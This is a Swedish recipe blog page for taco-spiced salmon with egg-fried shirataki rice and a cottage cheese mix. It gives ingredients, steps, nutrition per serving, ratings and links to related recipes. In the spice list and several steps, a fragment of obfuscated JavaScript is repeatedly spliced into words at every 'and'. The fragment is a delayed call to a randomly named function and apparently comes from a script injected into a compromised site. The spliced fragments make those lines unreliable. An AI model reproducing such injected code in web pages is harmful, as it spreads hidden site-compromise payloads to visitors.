Tacokryddad lax med äggsteka shirataki ris och kesoröra.

2013-06-10
IMG_1375-550x309
  • Prep Time : 0m
  • Cook Time : 0m
  • Ready In : 0m

Vet inte varför men blev helt plötsligt så sugen på lax taco, och kände att det var tid att leka med shirataki riset. Ni kan använda vanligt ris istället.

 

Ni kan även köpa färdig taco krydda men jag valde att göra min egen efter jag läst innehållsförteckningen i affären och insåg att det innehöll alldeles för mycket E-ämnen och socker.

 

Skinnet behöver ni inte steka, jag gillar krispigt lax skinn men det är inget nödvändigt.

Tid 15 minuter.

160g tärnad lax

200g 1 paket shirataki ris

55g 1st ägg

50g hackad lök

50g 4st delade cocktailtomater

5g kokosfett

50g keso

Persilja

Vitlökspulver

Örtsalt

 

Tacokrydda.

1/2 tesked vitlökspulver

1/2 tesked paprikapulver

1/2 tesked cayennepeppar

1/2 tesked persilja

1/2 tesked koriandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}erpulver

1/2 tesked spiskummin

1/2 tesked stevia

1 tesked örtsalt

 

Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a taco kryddan, blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a med den tärnade laxen. Låt stå.

Sätt igång ugnen på 180C

 

Blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a keso med hälften av rödlöken, persilja, vitlökspulver och örtsalt.

Placera laxen i en stekpanna i ugnen i 5 minuter.

 

Skölj shirataki riset i varmt vatten i 1 minut.

 

( Strimla laxskinnet, stek i kokosfett på högvärme i ett par minuter tills krispig, placera på pappersservett.)

 

Stek rödlök med kokosfett i 1 minut, blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i ägget och rör om snabbt i några sekunder sen blandandom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}a i shirataki riset, låt allt fräsa i 1 minut, krydda med persilja, vitlökspulver och örtsalt.

Servera.

IMG_1375IMG_1374

För hela. Kalorier 494,9

Protein 43,4

Kolhydrater 6,3

Fett 31,9

 

Delat på två portioner.

Kalorier 247,5

Protein 21,7

Kolhydrater 3,2

Fett 16

 

 

 

 

Recipe Type: Ingredienser: , ,
Medlemsbetyg

(4 / 5)

4 5 2
Betygsätt recept

2 people rated this recipe

Related Recipes:
  • Nutellapannkakor

    Nutellapannkakor

  • image

    Fisksoppa med smak av tomat och vitlök

  • image

    Hamburgare med äggbröd

  • Hummus

    Proteinrik hummus

  • image

    Glasstårta med proteinpulver

Recipe Comments

Post A Comment

Current ye@r *